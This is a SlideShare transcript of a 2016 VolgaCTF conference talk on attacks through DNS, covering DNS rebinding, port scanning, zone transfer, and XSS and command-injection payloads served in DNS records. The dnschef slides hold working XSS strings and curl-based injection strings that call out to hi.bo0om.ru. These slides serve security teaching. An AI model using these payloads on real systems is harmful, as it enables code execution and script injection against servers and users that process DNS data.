SlideShare a Scribd company logo

VolgaCTF | Bo0oM - DNS and attacks

Download as PPTX, PDF
Дмитрий Бумов
Дмитрий Бумов

DNS and attacks

Technology
1 of 40
2016
DNS and attacks
What is DNS? The Domain Name System (DNS) is a hierarchical decentralized naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participating entities. Most prominently, it translates more readily memorized domain names to the numerical IP addresses needed for the purpose of locating and identifying computer services and devices with the underlying network protocols. By providing a worldwide, distributed directory service, the Domain Name System is an essential component of the functionality of the Internet.
213.180.204.3 mycomputer.arpa 173.194.32.169 dennis.arpa 87.240.165.87 newoffice.arpa 173.252.89.132 test1122 10.28.114.254 it.chat.in-addr.arpa Hosts.txt
A KEY DS AAAA DNSKEY CNAME MXNS PTR SOA TSIG SRV TXT
DNS and DDoS
dig -t axfr sitename.com
http://half-life.wikia.com/wiki/Half-Life_2_Beta http://pixelsmashers.com/wordpress/?p=7866
DNS and SOP
What is SOP? In computing, the same-origin policy is an important concept in the web application security model. Under the policy, a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin. An origin is defined as a combination of URI scheme, hostname, and port number. This policy prevents a malicious script on one page from obtaining access to sensitive data on another web page through that page's Document Object Model.
Same-origin policy
A 97.246.251.93 A 192.168.0.1 evil.xxx:
https://crypto.stanford.edu/dns/dns-rebinding.pdf https://www.ptsecurity.com/download/DNS-rebinding.pdf The resulting attack consists of the following steps: 1. The victim addresses the dns.evil.xxx domain. 2. The attacker’s DNS server returns both IP addresses in the fixed order. 3. The browser redirects the request to the server at the external 97.246.251.93 IP address. 4. The server returns an HTML page containing JavaScript. 5. After the browser downloads the page, the client’s JavaScript sends a request to the dns.evil.xxx domain. 6. After the request is received, the server script blocks the incoming connections with the victim’s IP address. 7. After a while, the client’s script re-addresses the dns.attacker.ru domain. Since the server returns RTS from the 97.246.251.93 IP address, the request is redirected to the local server at 192.168.0.1. Now the JavaScript is able to send any GET/POST/HEAD requests to an application at 97.246.251.93, as well as process the received responses and send the results to the attacker..
DNS and ports
A 1.2.3.4 A 4.3.2.1 A 192.168.1.1 evil.xxx: ?
test.evil.xxx 192.168.1.1 test.evil.xxx report1.host test2.evil.xxx 192.168.1.2 test2.evil.xxx report2.host test3.evil.xxx 192.168.1.3 test3.evil.xxx report3.host test4.evil.xxx 192.168.1.4 test4.evil.xxx report4.host cat /etc/hosts ?
test.evil.xxx 192.168.1.1 test.evil.xxx report1.host test2.evil.xxx 192.168.1.2 test2.evil.xxx report2.host test3.evil.xxx 192.168.1.3 test3.evil.xxx report3.host test4.evil.xxx 192.168.1.4 test4.evil.xxx report4.host cat /etc/hosts 192.168.1.3:3306 - open port create page: <img src=”http://test.evil.xxx:3306”>
test.evil.xxx 192.168.1.1 test.evil.xxx report1.host test2.evil.xxx 192.168.1.2 test2.evil.xxx report2.host test3.evil.xxx 192.168.1.3 test3.evil.xxx report3.host test4.evil.xxx 192.168.1.4 test4.evil.xxx report4.host cat /etc/hosts test.evil.xxx (192.168.1.1) err test.evil.xxx (report1.host) ok, redirect test2.evil.xxx (192.168.1.2) err test2.evil.xxx (report2.host) ok, redirect test3.evil.xxx (192.168.1.2) ok! test3.evil.xxx report3.host
DNS and DoS
ns.hack.bo0om.ru. 0 IN NS ns.hack.bo0om.ru.
DNS and XSS
https://news.ycombinator.com/item?id=8336025 http://www.serveradminblog.com/2014/09/xss-via-dns/
Dnschef [NS] # Queries for mail server records *.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?ns></script> [MX] # Queries for mail server records *.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?cname></script> [CNAME] # Queries for alias records *.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?cname></script> http://thesprawl.org/projects/dnschef/
DNS and RCE
RCE vectors & whoami `whoami` $(whoami) ‘&whoami “&whoami With $IFS set to default, a blank line displays
Dnschef [NS] # Queries for mail server records *.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&'"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`' [MX] # Queries for mail server records *.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&'"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`' [CNAME] # Queries for alias records *.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&'"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'
DNS and SQLinj
DNS and SQLinj, OOB
DNS and SQLinj, OOB, DNS hijacking, DNS cache poisoning, DNS flood...
Anton “Bo0oM” Lopanitsyn https://bo0om.ru @i_bo0om Questions?

Recommended

Proxy
ProxyProxy
Proxyleminhvuong
 
Dns server converted
Dns server convertedDns server converted
Dns server convertedmariymmithila
 
Network Mapping with PowerShell
Network Mapping with PowerShellNetwork Mapping with PowerShell
Network Mapping with PowerShellCostin-Alin Neacsu
 
Lec 7(HTTP Protocol)
Lec 7(HTTP Protocol)Lec 7(HTTP Protocol)
Lec 7(HTTP Protocol)maamir farooq
 
Appl layer
Appl layerAppl layer
Appl layerrajanikant
 
Wireshark http - 2110165028
Wireshark http - 2110165028Wireshark http - 2110165028
Wireshark http - 2110165028Nanda Afif
 
21 HTTP Protocol #burningkeyboards
21 HTTP Protocol #burningkeyboards21 HTTP Protocol #burningkeyboards
21 HTTP Protocol #burningkeyboardsDenis Ristic
 
Http protocol
Http protocolHttp protocol
Http protocolArpita Naik
 

Recommended

Proxy
ProxyProxy
Proxyleminhvuong
 
Dns server converted
Dns server convertedDns server converted
Dns server convertedmariymmithila
 
Network Mapping with PowerShell
Network Mapping with PowerShellNetwork Mapping with PowerShell
Network Mapping with PowerShellCostin-Alin Neacsu
 
Lec 7(HTTP Protocol)
Lec 7(HTTP Protocol)Lec 7(HTTP Protocol)
Lec 7(HTTP Protocol)maamir farooq
 
Appl layer
Appl layerAppl layer
Appl layerrajanikant
 
Wireshark http - 2110165028
Wireshark http - 2110165028Wireshark http - 2110165028
Wireshark http - 2110165028Nanda Afif
 
21 HTTP Protocol #burningkeyboards
21 HTTP Protocol #burningkeyboards21 HTTP Protocol #burningkeyboards
21 HTTP Protocol #burningkeyboardsDenis Ristic
 
Http protocol
Http protocolHttp protocol
Http protocolArpita Naik
 
Http-protocol
Http-protocolHttp-protocol
Http-protocolToushik Paul
 
BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopAjay Choudhary
 
Wireshark lab ssl v7 solution
Wireshark lab ssl v7 solutionWireshark lab ssl v7 solution
Wireshark lab ssl v7 solutionUnited International University
 
Hypertext transfer protocol and hypertext transfer protocol secure(HTTP and H...
Hypertext transfer protocol and hypertext transfer protocol secure(HTTP and H...Hypertext transfer protocol and hypertext transfer protocol secure(HTTP and H...
Hypertext transfer protocol and hypertext transfer protocol secure(HTTP and H...rahul kundu
 
5.Dns Rpc Nfs 2
5.Dns Rpc Nfs 25.Dns Rpc Nfs 2
5.Dns Rpc Nfs 2phanleson
 
Meeting 4 : proxy
Meeting 4 : proxyMeeting 4 : proxy
Meeting 4 : proxySyaiful Ahdan
 
5.Dns Rpc Nfs
5.Dns Rpc Nfs5.Dns Rpc Nfs
5.Dns Rpc Nfsphanleson
 
Prism-Proof Cloud Email Services
Prism-Proof Cloud Email ServicesPrism-Proof Cloud Email Services
Prism-Proof Cloud Email Serviceshughpearse
 
Web application technologies
Web application technologiesWeb application technologies
Web application technologiesAtul Tiwari
 
Proxy Servers
Proxy ServersProxy Servers
Proxy ServersSourav Roy
 
Http VS. Https
Http VS. HttpsHttp VS. Https
Http VS. HttpsRaed Aldahdooh
 
HTTP Basics
HTTP BasicsHTTP Basics
HTTP Basicssanjoysanyal
 
Type of DDoS attacks with hping3 example
Type of DDoS attacks with hping3 exampleType of DDoS attacks with hping3 example
Type of DDoS attacks with hping3 exampleHimani Singh
 
Http - All you need to know
Http - All you need to knowHttp - All you need to know
Http - All you need to knowGökhan Şengün
 
Http basics by-joshi_29_4_15-ppt
Http basics by-joshi_29_4_15-pptHttp basics by-joshi_29_4_15-ppt
Http basics by-joshi_29_4_15-pptQwinix Technologies
 
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...Denis Kolegov
 
Common Dos and DDoS
Common Dos and DDoSCommon Dos and DDoS
Common Dos and DDoSJayesh Patel
 
Computer network (2)
Computer network (2)Computer network (2)
Computer network (2)NYversity
 
Proxy http ftp dns email
Proxy http ftp dns emailProxy http ftp dns email
Proxy http ftp dns emailHeera K S
 
PPT
PPTPPT
PPTwebhostingguy
 
Fuzz.txt
Fuzz.txtFuzz.txt
Fuzz.txtДмитрий Бумов
 
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...Дмитрий Бумов
 

More Related Content

What's hot

BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopAjay Choudhary
 
Hypertext transfer protocol and hypertext transfer protocol secure(HTTP and H...
Hypertext transfer protocol and hypertext transfer protocol secure(HTTP and H...Hypertext transfer protocol and hypertext transfer protocol secure(HTTP and H...
Hypertext transfer protocol and hypertext transfer protocol secure(HTTP and H...rahul kundu
 
5.Dns Rpc Nfs 2
5.Dns Rpc Nfs 25.Dns Rpc Nfs 2
5.Dns Rpc Nfs 2phanleson
 
5.Dns Rpc Nfs
5.Dns Rpc Nfs5.Dns Rpc Nfs
5.Dns Rpc Nfsphanleson
 
Prism-Proof Cloud Email Services
Prism-Proof Cloud Email ServicesPrism-Proof Cloud Email Services
Prism-Proof Cloud Email Serviceshughpearse
 
Web application technologies
Web application technologiesWeb application technologies
Web application technologiesAtul Tiwari
 
Type of DDoS attacks with hping3 example
Type of DDoS attacks with hping3 exampleType of DDoS attacks with hping3 example
Type of DDoS attacks with hping3 exampleHimani Singh
 
Http - All you need to know
Http - All you need to knowHttp - All you need to know
Http - All you need to knowGökhan Şengün
 
Http basics by-joshi_29_4_15-ppt
Http basics by-joshi_29_4_15-pptHttp basics by-joshi_29_4_15-ppt
Http basics by-joshi_29_4_15-pptQwinix Technologies
 
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...Denis Kolegov
 
Common Dos and DDoS
Common Dos and DDoSCommon Dos and DDoS
Common Dos and DDoSJayesh Patel
 
Computer network (2)
Computer network (2)Computer network (2)
Computer network (2)NYversity
 
Proxy http ftp dns email
Proxy http ftp dns emailProxy http ftp dns email
Proxy http ftp dns emailHeera K S
 

What's hot (20)

Http-protocol
Http-protocolHttp-protocol
Http-protocol
 
BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming Workshop
 
Wireshark lab ssl v7 solution
Wireshark lab ssl v7 solutionWireshark lab ssl v7 solution
Wireshark lab ssl v7 solution
 
Hypertext transfer protocol and hypertext transfer protocol secure(HTTP and H...
Hypertext transfer protocol and hypertext transfer protocol secure(HTTP and H...Hypertext transfer protocol and hypertext transfer protocol secure(HTTP and H...
Hypertext transfer protocol and hypertext transfer protocol secure(HTTP and H...
 
5.Dns Rpc Nfs 2
5.Dns Rpc Nfs 25.Dns Rpc Nfs 2
5.Dns Rpc Nfs 2
 
Meeting 4 : proxy
Meeting 4 : proxyMeeting 4 : proxy
Meeting 4 : proxy
 
5.Dns Rpc Nfs
5.Dns Rpc Nfs5.Dns Rpc Nfs
5.Dns Rpc Nfs
 
Prism-Proof Cloud Email Services
Prism-Proof Cloud Email ServicesPrism-Proof Cloud Email Services
Prism-Proof Cloud Email Services
 
Web application technologies
Web application technologiesWeb application technologies
Web application technologies
 
Proxy Servers
Proxy ServersProxy Servers
Proxy Servers
 
Http VS. Https
Http VS. HttpsHttp VS. Https
Http VS. Https
 
HTTP Basics
HTTP BasicsHTTP Basics
HTTP Basics
 
Type of DDoS attacks with hping3 example
Type of DDoS attacks with hping3 exampleType of DDoS attacks with hping3 example
Type of DDoS attacks with hping3 example
 
Http - All you need to know
Http - All you need to knowHttp - All you need to know
Http - All you need to know
 
Http basics by-joshi_29_4_15-ppt
Http basics by-joshi_29_4_15-pptHttp basics by-joshi_29_4_15-ppt
Http basics by-joshi_29_4_15-ppt
 
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...
 
Common Dos and DDoS
Common Dos and DDoSCommon Dos and DDoS
Common Dos and DDoS
 
Computer network (2)
Computer network (2)Computer network (2)
Computer network (2)
 
Proxy http ftp dns email
Proxy http ftp dns emailProxy http ftp dns email
Proxy http ftp dns email
 
PPT
PPTPPT
PPT
 

Viewers also liked

Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...Дмитрий Бумов
 
пресс конференция 15.06.2016. безопасность платежных систем и банков
пресс конференция 15.06.2016. безопасность платежных систем и банковпресс конференция 15.06.2016. безопасность платежных систем и банков
пресс конференция 15.06.2016. безопасность платежных систем и банковДмитрий Бумов
 
Bo0oM - Deanonymization and total espionage (ZeroNights, 2014)
Bo0oM - Deanonymization and total espionage (ZeroNights, 2014)Bo0oM - Deanonymization and total espionage (ZeroNights, 2014)
Bo0oM - Deanonymization and total espionage (ZeroNights, 2014)Дмитрий Бумов
 
Intercepter-NG: сниффер нового поколения
Intercepter-NG: сниффер нового поколенияIntercepter-NG: сниффер нового поколения
Intercepter-NG: сниффер нового поколенияPositive Hack Days
 

Viewers also liked (8)

Fuzz.txt
Fuzz.txtFuzz.txt
Fuzz.txt
 
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
 
Zeronights 2013 - воруем домены
Zeronights 2013 - воруем доменыZeronights 2013 - воруем домены
Zeronights 2013 - воруем домены
 
Не nmap'ом единым
Не nmap'ом единымНе nmap'ом единым
Не nmap'ом единым
 
Разведка боем
Разведка боемРазведка боем
Разведка боем
 
пресс конференция 15.06.2016. безопасность платежных систем и банков
пресс конференция 15.06.2016. безопасность платежных систем и банковпресс конференция 15.06.2016. безопасность платежных систем и банков
пресс конференция 15.06.2016. безопасность платежных систем и банков
 
Bo0oM - Deanonymization and total espionage (ZeroNights, 2014)
Bo0oM - Deanonymization and total espionage (ZeroNights, 2014)Bo0oM - Deanonymization and total espionage (ZeroNights, 2014)
Bo0oM - Deanonymization and total espionage (ZeroNights, 2014)
 
Intercepter-NG: сниффер нового поколения
Intercepter-NG: сниффер нового поколенияIntercepter-NG: сниффер нового поколения
Intercepter-NG: сниффер нового поколения
 

Similar to VolgaCTF | Bo0oM - DNS and attacks

System and network administration network services
System and network administration network servicesSystem and network administration network services
System and network administration network servicesUc Man
 
Linux Based Network Proposal
Linux Based Network ProposalLinux Based Network Proposal
Linux Based Network ProposalChris Riccio
 
Dns protocol design attacks and security
Dns protocol design attacks and securityDns protocol design attacks and security
Dns protocol design attacks and securityMichael Earls
 
How to configure dns server(2)
How to configure dns server(2)How to configure dns server(2)
How to configure dns server(2)Amandeep Kaur
 
DNSPresentation.pptx
DNSPresentation.pptxDNSPresentation.pptx
DNSPresentation.pptxKailashTayde
 
Domain Name System DNS
Domain Name System DNSDomain Name System DNS
Domain Name System DNSAkshay Tiwari
 
06 coms 525 tcpip - dhcp and dns
06 coms 525 tcpip - dhcp and dns06 coms 525 tcpip - dhcp and dns
06 coms 525 tcpip - dhcp and dnsPalanivel Kuppusamy
 
domain network services (dns)
domain network services (dns) domain network services (dns)
domain network services (dns)Vikas Jagtap
 
DNS server packet tracer
DNS server packet tracerDNS server packet tracer
DNS server packet tracerJalalMiah5
 
DNS Server configuration in cisco packet tracer
DNS Server configuration in cisco packet tracerDNS Server configuration in cisco packet tracer
DNS Server configuration in cisco packet tracerShovonKumar1
 
Linux Systems Prograramming: Unix Domain, Internet Domain (TCP, UDP) Socket P...
Linux Systems Prograramming: Unix Domain, Internet Domain (TCP, UDP) Socket P...Linux Systems Prograramming: Unix Domain, Internet Domain (TCP, UDP) Socket P...
Linux Systems Prograramming: Unix Domain, Internet Domain (TCP, UDP) Socket P...RashidFaridChishti
 
Content Navigation
Content NavigationContent Navigation
Content Navigationsanjoysanyal
 
DNS server config on cisco packet tracer
DNS server config on cisco packet tracerDNS server config on cisco packet tracer
DNS server config on cisco packet tracerArjun Das
 

Similar to VolgaCTF | Bo0oM - DNS and attacks (20)

System and network administration network services
System and network administration network servicesSystem and network administration network services
System and network administration network services
 
Linux Based Network Proposal
Linux Based Network ProposalLinux Based Network Proposal
Linux Based Network Proposal
 
Dns protocol design attacks and security
Dns protocol design attacks and securityDns protocol design attacks and security
Dns protocol design attacks and security
 
How to configure dns server(2)
How to configure dns server(2)How to configure dns server(2)
How to configure dns server(2)
 
Lecture 6
Lecture 6Lecture 6
Lecture 6
 
Lecture 6
Lecture 6Lecture 6
Lecture 6
 
DNSPresentation.pptx
DNSPresentation.pptxDNSPresentation.pptx
DNSPresentation.pptx
 
Domain Name System DNS
Domain Name System DNSDomain Name System DNS
Domain Name System DNS
 
06 coms 525 tcpip - dhcp and dns
06 coms 525 tcpip - dhcp and dns06 coms 525 tcpip - dhcp and dns
06 coms 525 tcpip - dhcp and dns
 
Dns detail understanding
Dns detail understandingDns detail understanding
Dns detail understanding
 
1.1 DNS.ppt.ppt
1.1 DNS.ppt.ppt1.1 DNS.ppt.ppt
1.1 DNS.ppt.ppt
 
domain network services (dns)
domain network services (dns) domain network services (dns)
domain network services (dns)
 
DNS server packet tracer
DNS server packet tracerDNS server packet tracer
DNS server packet tracer
 
Unit 6 : Application Layer
Unit 6 : Application LayerUnit 6 : Application Layer
Unit 6 : Application Layer
 
DNS Server configuration in cisco packet tracer
DNS Server configuration in cisco packet tracerDNS Server configuration in cisco packet tracer
DNS Server configuration in cisco packet tracer
 
Linux Systems Prograramming: Unix Domain, Internet Domain (TCP, UDP) Socket P...
Linux Systems Prograramming: Unix Domain, Internet Domain (TCP, UDP) Socket P...Linux Systems Prograramming: Unix Domain, Internet Domain (TCP, UDP) Socket P...
Linux Systems Prograramming: Unix Domain, Internet Domain (TCP, UDP) Socket P...
 
Dns
DnsDns
Dns
 
DNS - MCSE 2019
DNS - MCSE 2019DNS - MCSE 2019
DNS - MCSE 2019
 
Content Navigation
Content NavigationContent Navigation
Content Navigation
 
DNS server config on cisco packet tracer
DNS server config on cisco packet tracerDNS server config on cisco packet tracer
DNS server config on cisco packet tracer
 

More from Дмитрий Бумов

Defcon Russia 2017 - Bo0oM vs Шурыгина
Defcon Russia 2017 - Bo0oM vs ШурыгинаDefcon Russia 2017 - Bo0oM vs Шурыгина
Defcon Russia 2017 - Bo0oM vs ШурыгинаДмитрий Бумов
 
Отравление кэша веб-приложений
Отравление кэша веб-приложенийОтравление кэша веб-приложений
Отравление кэша веб-приложенийДмитрий Бумов
 
XSS. Обходы фильтров и защит.
XSS. Обходы фильтров и защит.XSS. Обходы фильтров и защит.
XSS. Обходы фильтров и защит.Дмитрий Бумов
 
Skolkovo школа | Капельку о MITM
Skolkovo школа | Капельку о MITMSkolkovo школа | Капельку о MITM
Skolkovo школа | Капельку о MITMДмитрий Бумов
 
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegram
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegramPHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegram
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegramДмитрий Бумов
 
Geek Picnic 2015 - Большой брат следит за тобой
Geek Picnic 2015 - Большой брат следит за тобойGeek Picnic 2015 - Большой брат следит за тобой
Geek Picnic 2015 - Большой брат следит за тобойДмитрий Бумов
 
Bo0oM - Ты такой смешной XD #securitymeetup
Bo0oM - Ты такой смешной XD #securitymeetupBo0oM - Ты такой смешной XD #securitymeetup
Bo0oM - Ты такой смешной XD #securitymeetupДмитрий Бумов
 
Bo0oM - There's Nothing so Permanent as Temporary (PHDays IV, 2014)
Bo0oM - There's Nothing so Permanent as Temporary (PHDays IV, 2014)Bo0oM - There's Nothing so Permanent as Temporary (PHDays IV, 2014)
Bo0oM - There's Nothing so Permanent as Temporary (PHDays IV, 2014)Дмитрий Бумов
 

More from Дмитрий Бумов (19)

2000day in Safari
2000day in Safari2000day in Safari
2000day in Safari
 
Partyhack 3.0 - Telegram bugbounty writeup
Partyhack 3.0 - Telegram bugbounty writeupPartyhack 3.0 - Telegram bugbounty writeup
Partyhack 3.0 - Telegram bugbounty writeup
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
 
ZeroNights 2018 | Race Condition Tool
ZeroNights 2018 | Race Condition ToolZeroNights 2018 | Race Condition Tool
ZeroNights 2018 | Race Condition Tool
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
Defcon Russia 2017 - Bo0oM vs Шурыгина
Defcon Russia 2017 - Bo0oM vs ШурыгинаDefcon Russia 2017 - Bo0oM vs Шурыгина
Defcon Russia 2017 - Bo0oM vs Шурыгина
 
DC7499 - Param-pam-pam
DC7499 - Param-pam-pamDC7499 - Param-pam-pam
DC7499 - Param-pam-pam
 
KazHackStan - "><script>alert()</script>
KazHackStan - "><script>alert()</script>KazHackStan - "><script>alert()</script>
KazHackStan - "><script>alert()</script>
 
VolgaCTF 2018 - Neatly bypassing CSP
VolgaCTF 2018 - Neatly bypassing CSPVolgaCTF 2018 - Neatly bypassing CSP
VolgaCTF 2018 - Neatly bypassing CSP
 
Отравление кэша веб-приложений
Отравление кэша веб-приложенийОтравление кэша веб-приложений
Отравление кэша веб-приложений
 
XSS. Обходы фильтров и защит.
XSS. Обходы фильтров и защит.XSS. Обходы фильтров и защит.
XSS. Обходы фильтров и защит.
 
RIW 2017 | Все плохо
RIW 2017 | Все плохоRIW 2017 | Все плохо
RIW 2017 | Все плохо
 
Skolkovo школа | Капельку о MITM
Skolkovo школа | Капельку о MITMSkolkovo школа | Капельку о MITM
Skolkovo школа | Капельку о MITM
 
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegram
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegramPHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegram
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegram
 
Armsec 2017 | 2 bugs 1 safari
Armsec 2017 | 2 bugs 1 safariArmsec 2017 | 2 bugs 1 safari
Armsec 2017 | 2 bugs 1 safari
 
KazHackStan 2017 | Tracking
KazHackStan 2017 | TrackingKazHackStan 2017 | Tracking
KazHackStan 2017 | Tracking
 
Geek Picnic 2015 - Большой брат следит за тобой
Geek Picnic 2015 - Большой брат следит за тобойGeek Picnic 2015 - Большой брат следит за тобой
Geek Picnic 2015 - Большой брат следит за тобой
 
Bo0oM - Ты такой смешной XD #securitymeetup
Bo0oM - Ты такой смешной XD #securitymeetupBo0oM - Ты такой смешной XD #securitymeetup
Bo0oM - Ты такой смешной XD #securitymeetup
 
Bo0oM - There's Nothing so Permanent as Temporary (PHDays IV, 2014)
Bo0oM - There's Nothing so Permanent as Temporary (PHDays IV, 2014)Bo0oM - There's Nothing so Permanent as Temporary (PHDays IV, 2014)
Bo0oM - There's Nothing so Permanent as Temporary (PHDays IV, 2014)
 

Recently uploaded

Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backElena Simperl
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesThousandEyes
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Product School
 
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxIOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxAbida Shariff
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...Product School
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesBhaskar Mitra
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
 
Exploring UiPath Orchestrator API: updates and limits in 2024 🚀
Exploring UiPath Orchestrator API: updates and limits in 2024 🚀Exploring UiPath Orchestrator API: updates and limits in 2024 🚀
Exploring UiPath Orchestrator API: updates and limits in 2024 🚀DianaGray10
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxDavid Michel
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Product School
 
UiPath Test Automation using UiPath Test Suite series, part 1
UiPath Test Automation using UiPath Test Suite series, part 1UiPath Test Automation using UiPath Test Suite series, part 1
UiPath Test Automation using UiPath Test Suite series, part 1DianaGray10
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...Elena Simperl
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaRTTS
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...Product School
 
Demystifying gRPC in .Net by John Staveley
Demystifying gRPC in .Net by John StaveleyDemystifying gRPC in .Net by John Staveley
Demystifying gRPC in .Net by John StaveleyJohn Staveley
 

Recently uploaded (20)

